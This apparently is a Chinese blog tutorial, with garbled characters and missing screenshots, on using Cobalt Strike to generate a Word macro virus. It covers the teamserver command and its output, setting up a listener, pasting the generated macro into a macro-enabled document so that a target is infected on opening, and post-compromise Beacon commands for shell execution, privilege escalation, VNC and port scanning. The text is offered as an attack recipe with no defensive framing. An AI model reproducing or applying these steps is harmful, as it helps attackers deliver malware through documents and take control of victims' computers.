Cs宏病毒
Cs宏病毒
一、打開服務器
./teamserver 192.168.100.130 ajie ????運行團隊服務器(其中ajie是密碼)
運行后結果:
??????????????????????????????????????????????????????????????????????????????????????
┌──(root���kali)-[/home/…/Desktop/cs4.0/cs4.0/cobalt-strike]
└─# ./teamserver 192.168.100.130 ajie??
[*] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA256 hash of SSL cert is: 7b49fc589e7e738e3457859d269996ecef83f693570b0ac482c426
[+] Listener: ok started!
- 打開圖形化界面連接服務器(這里使用的是本機,故使用本機ip,密碼是上面設置的ajie)
./cs.sh 進入圖形化界面
注其中的服務器指紋是上面的哈希值:?7b49fc589e7e738e3457859d269996ecef83f693570b0ac482c426
連接后的圖形化界面(下面黑色那塊是聊天室)
- 添加一個監聽器
- 生成宏病毒
①點擊生成宏病毒
②選擇我們剛剛設置的監聽器
此時,我們將獲得宏病毒的代碼(直接復制)
④創建一個word文檔將我們剛剛復制的宏粘貼進去
注:保存的文檔文件類型一定要設置成啟用宏
正常點擊文檔后目標馬上中宏病毒
但這語法錯誤.....(不能使用wps)
于是乎,改用word2010
Emmm,又無了
換成word2016
目標主機打開帶宏文件后,成功中獲取
Beacon命令
sleep:心跳時間 客戶端和服務器的通信時間,默認為60s,修改會顯時間即可馬上回顯,輸入sleep 0?
shell: 執行命令 例子:shell dir
beacon中提權
提權指令:elevate,或者右鍵,點擊執行模塊,再點擊提權即可
右鍵還有vnc、瀏覽器代理、端口掃描等。
總結
- 上一篇: Java 开发必看的 5个 Github
- 下一篇: 一个SAP顾问在美国的这些年